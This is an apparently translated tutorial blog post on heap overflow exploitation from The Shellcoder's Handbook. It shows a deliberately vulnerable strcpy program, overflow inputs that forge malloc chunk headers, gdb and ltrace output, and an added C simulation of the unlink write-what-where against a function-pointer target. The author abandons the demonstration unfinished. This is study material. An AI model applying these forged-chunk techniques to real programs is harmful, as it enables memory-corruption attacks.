Shellcode 5: Heap Overflow

Source: Internet
Author: User

Statement: The main content is from The Shellcoder's Handbook; I have extracted the important points and added some personal understanding. If anything is wrong, please point it out.

Almost all malloc implementations use metadata to record the location, size, or other bookkeeping data of the blocks they manage. dlmalloc keeps free blocks in bins (buckets); some other allocators keep them in a balanced tree. This metadata is generally stored in two places: global variables belonging to the malloc implementation itself, and the memory immediately before and after each block handed to the user.

Basic Heap Overflow

The basic principle of most heap overflows is the same as on the stack: the heap holds both user data and the control information the allocator uses to interpret that data. The skill to master is getting malloc and free to write one or two words to a memory address we control.

Let's first look at a program that will generate a heap overflow:

// file: basicheap.c
#include <stdio.h>
#include <stdlib.h>     /* malloc, free */
#include <string.h>     /* strcpy */

int main(int argc, char *argv[])
{
    char *buf;
    char *buf2;

    if (argc < 2)
        return 1;

    buf = (char *)malloc(1024);
    buf2 = (char *)malloc(1024);   /* placed directly after buf's chunk on the heap */
    printf("buf=%p, buf2=%p\n", buf, buf2);

    strcpy(buf, argv[1]);          /* unbounded copy: the intended overflow */
    free(buf2);                    /* free() now parses the corrupted chunk header */
    return 0;
}

The program allocates two buffers that are adjacent in memory. When the first buffer overflows, the metadata (chunk header) of the second buffer is overwritten. Compile it and run it under ltrace:

sep@sep:~/project/shellcode$ ltrace ./basicheap `perl -e 'print "A" x 5000'`
__libc_start_main(0x8048444, 2, 0xbfb19a24, 0x80484d0, 0x80484c0 <unfinished ...>
malloc(1024)                                            = 0x804a008
malloc(1024)                                            = 0x804a410
printf("buf=%p, buf2=%p\n", 0x804a008, 0x804a410buf=0x804a008, buf2=0x804a410
)                                                       = 30
strcpy(0x804a008, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) = 0x804a008
free(0x804a410 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

A segmentation fault occurs. The two buffers start at 0x804a008 and 0x804a410, so the distance between them is 0x804a410 - 0x804a008 = 0x408 = 1032 = 1024 + 8: the 1024-byte buffer plus the 8-byte chunk header (the prev_size and size words). When strcpy copies 5000 bytes into buf, the heap overflow overwrites the header of buf2, and free(buf2) then crashes while interpreting the corrupted header.

For the use of tools such as strace and ltrace, see: http://www.ibm.com/developerworks/cn/linux/l-tsl/

The key to the problem is how to trick malloc into processing the modified block. First we clear the PREV_INUSE bit of the overwritten chunk header, then we set the size of the "first block" to a negative number; this makes the allocator treat the contents of our buffer as chunks of our own definition.

Malloc implementations, including the dlmalloc-derived one on Linux, store additional information in free blocks. The first four bytes of a free block's user area hold the forward pointer (fd) and the next four bytes hold the backward pointer (bk); together they keep the free block on a doubly linked list. When a block is inserted into or removed (unlinked) from this list, the allocator writes through these pointers, so if we control them we can write to any memory address.

./basicheap `python -c 'print "A"*1024 + "\xff\xff\xff\xff" + "\xf0\xff\xff\xff"'`

After this command runs, buf overflows within the heap and the eight header bytes of buf2 are changed: the prev_size word becomes 0xffffffff and the size word becomes 0xfffffff0.

Finding the buffer length. In the example above we can usually see where the buffer starts in memory (the run of "A"s); the word just before it is the chunk size. (gdb) x/xw buf-4 shows 0x409 = 1033: the size 1032 (the 1024 bytes of buf plus the 8 bytes of chunk metadata) with its lowest bit set. The low bits of the size word are flags. The lowest bit (PREV_INUSE) tells whether the previous chunk is in use: when it is 1, as here, the previous chunk is allocated and the header does not hold its size; when it is 0, the previous chunk is free and the word at buf-8 (prev_size) holds its size. The second-lowest bit (IS_MMAPPED) marks chunks that were obtained with mmap rather than from the heap.
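The unlink write described in the free-list paragraph above, together with the size-word flag bits just discussed, as an added C example; it is not code from the original page or from The Shellcoder's Handbook. It simulates the doubly linked list handling on a forged chunk struct in ordinary memory instead of calling the real allocator, so it runs on a current glibc. The names target_slot, payload, forge and the demo_* functions are hypothetical and chosen for this example; the hardened variant follows the "corrupted double-linked list" check that later glibc versions added, shown here so the classic write-what-where and the reason it stopped working sit side by side.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* dlmalloc-style chunk header in the layout described above: two size words,
 * then fd/bk occupying the first eight bytes of a free chunk's user area.
 * On a 64-bit build the pointers are wider; the code below only depends on
 * offsetof(), so it works either way. */
struct chunk {
    uint32_t prev_size;   /* size of the previous chunk, valid only if it is free */
    uint32_t size;        /* chunk size; low bits are the PREV_INUSE / IS_MMAPPED flags */
    struct chunk *fd;     /* forward pointer (free chunks only) */
    struct chunk *bk;     /* backward pointer (free chunks only) */
};

/* Decode the size word seen with "x/xw buf-4": 0x409 -> size 1032, PREV_INUSE set. */
uint32_t chunk_size_of(uint32_t size_word) { return size_word & ~(uint32_t)7; }
int chunk_prev_inuse(uint32_t size_word)  { return size_word & 1; }
int chunk_is_mmapped(uint32_t size_word)  { return (size_word >> 1) & 1; }

/* Classic (unhardened) unlink: remove p from its doubly linked free list.
 * fd and bk are trusted, so whoever controls them controls two writes:
 *   *(fd + offsetof(bk)) = bk   and   *(bk + offsetof(fd)) = fd */
void unlink_classic(struct chunk *p)
{
    struct chunk *fd = p->fd;
    struct chunk *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}

/* Hardened unlink in the spirit of later glibc: both neighbours must point
 * back at p, otherwise the list is treated as corrupted and nothing is written.
 * Returns 1 when p was unlinked, 0 when the chunk was rejected. */
int unlink_checked(struct chunk *p)
{
    struct chunk *fd = p->fd;
    struct chunk *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return 0;
    fd->bk = bk;
    bk->fd = fd;
    return 1;
}

/* Constructed victim state (hypothetical names): target_slot stands in for a
 * GOT entry or other function pointer the attacker wants to redirect, payload
 * for the attacker-controlled buffer it should point at afterwards. */
struct chunk *target_slot;
union { unsigned char bytes[64]; struct chunk as_chunk; } payload;

/* Normal case: a well-formed list a <-> b <-> c, unlink b, expect a <-> c. */
int demo_legit_unlink(void)
{
    struct chunk a = {0}, b = {0}, c = {0};
    a.fd = &b; b.bk = &a;
    b.fd = &c; c.bk = &b;
    if (!unlink_checked(&b))
        return 0;
    return a.fd == &c && c.bk == &a;
}

/* The forged header an overflow would leave in a chunk about to be unlinked:
 * fd chosen so that fd->bk aliases target_slot, bk set to the value to write. */
static void forge(struct chunk *fake)
{
    memset(fake, 0, sizeof *fake);
    fake->fd = (struct chunk *)((char *)&target_slot - offsetof(struct chunk, bk));
    fake->bk = &payload.as_chunk;
}

/* Attack case against the classic unlink: returns the new target_slot, now
 * &payload.as_chunk. The second write (bk->fd = fd) lands inside payload at
 * offsetof(struct chunk, fd), which is why real payloads open with a short
 * jump over those bytes. */
struct chunk *demo_forged_classic(void)
{
    struct chunk fake;
    target_slot = NULL;
    memset(payload.bytes, 0x90, sizeof payload.bytes);   /* NOP-sled stand-in */
    forge(&fake);
    unlink_classic(&fake);
    return target_slot;
}

/* Same forged chunk against the hardened unlink: rejected, target untouched. */
int demo_forged_checked(void)
{
    struct chunk fake;
    target_slot = NULL;
    forge(&fake);
    return unlink_checked(&fake);
}

int main(void)
{
    printf("size word 0x409: size=%u prev_inuse=%d\n",
           chunk_size_of(0x409), chunk_prev_inuse(0x409));
    printf("legit unlink ok: %d\n", demo_legit_unlink());
    printf("classic unlink: target_slot=%p payload=%p\n",
           (void *)demo_forged_classic(), (void *)&payload);
    printf("hardened unlink accepted forged chunk: %d\n", demo_forged_checked());
    return 0;
}
```

The forged chunk only needs two attacker-chosen words, which is exactly what an overflow into the next chunk's header plus the start of its user area gives you; the hardened check defeats it because the fake neighbours (target_slot and payload) do not point back at the fake chunk.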

sep@sep:~/project/shellcode$ gdb ./basicheap
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/i686/cmov/libthread_db.so.1".
(gdb) r `python -c 'print "A"*1024 + "\xfc\xff\xff\xff" + "\xf0\xff\xff\xff" + "AAAAABCDEFGH"'`
Starting program: /home/sep/project/shellcode/basicheap `python -c 'print "A"*1024 + "\xfc\xff\xff\xff" + "\xf0\xff\xff\xff" + "AAAAABCDEFGH"'`
Failed to read a valid object file image from memory.
buf=0x804a008, buf2=0x804a410                ; the first addresses of the two buffers
*** glibc detected *** /home/sep/project/shellcode/basicheap: free(): invalid pointer: 0x0804a410 ***
======= Backtrace: =========
/lib/i686/cmov/libc.so.6[0xb7ecc764]
/lib/i686/cmov/libc.so.6(cfree+0x96)[0xb7ece966]
/home/sep/project/shellcode/basicheap[0x80484b2]
/lib/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb7e74455]
/home/sep/project/shellcode/basicheap[0x80483b1]
======= Memory map: ========
08048000-08049000 r-xp 00000000 30559      /home/sep/project/shellcode/basicheap
08049000-0804a000 rw-p 00000000 30559      /home/sep/project/shellcode/basicheap
0804a000-0806b000 rw-p 0804a000 00:00 0    [heap]
b7d00000-b7d21000 rw-p b7d00000 00:00 0
b7d21000-b7e00000 ---p b7d21000 00:00 0
b7e48000-b7e54000 r-xp 00000000 08:01 1318 /lib/libgcc_s.so.1
b7e54000-b7e55000 rw-p rjb000 08:01 1318   /lib/libgcc_s.so.1
b7e5d000-b7e5e000 rw-p b7e5d000 00:00 0
b7e5e000-b7fb3000 r-xp 00000000 08:01 11668 /lib/i686/cmov/libc-2.7.so
b7fb3000-b7fb4000 r--p 00155000 08:01 11668 /lib/i686/cmov/libc-2.7.so
b7fb4000-b7fb6000 rw-p 00156000 11668      /lib/i686/cmov/libc-2.7.so
b7fb6000-b7fb9000 rw-p b7fb6000 0
b7fc0000-b7fc3000 rw-p b7fc0000 0
b7fc3000-b7fc4000 r-xp b7fc3000 0          [vdso]
b7fc4000-b7fde000 r-xp 00000000 08:01 11658 /lib/ld-2.7.so
b7fde000-b7fe0000 rw-p 0001a000 08:01 11658 /lib/ld-2.7.so
bf879000-bf88e000 rw-p bf879000 00:00 0    [stack]

Program received signal SIGABRT, Aborted.
0xb7fc3410 in ?? ()
(gdb) x/xw 0x804a008-4        ; buf-4: the size word of buf's chunk
0x804a004:      0x00000409
(gdb) x/xw 0x804a410-8        ; buf2-8: should be the previous chunk's size, now overwritten with 0xfffffffc
0x804a408:      0xfffffffc
(gdb) x/xw 0x804a410-4        ; buf2-4: should be the size of buf2, now overwritten with 0xfffffff0
0x804a40c:      0xfffffff0
(gdb) x/xw 0x804a410          ; buf2 itself holds the string "AAAAABCDEFGH"
0x804a410:      0x41414141
(gdb) x/xw 0x804a410+4
0x804a414:      0x44434241
(gdb)

Here, the test results on my operating system are totally different from those in the original book. Because the experiment gives no intuitive results, and the original text is very brief and obscure, I am confused about much of the content, so I will not continue this part here.
